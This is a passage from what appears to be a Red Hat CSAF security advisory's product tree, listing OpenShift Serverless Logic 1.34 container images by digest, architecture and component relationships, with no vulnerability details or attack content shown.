"openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product_id: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product_identification_helper: { purl: "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8&tag=1.34.0-2", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "ppc64le", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", }, product_reference: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", }, product_reference: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", }, product_reference: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", }, product_reference: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", }, product_reference: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", }, product_reference: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: 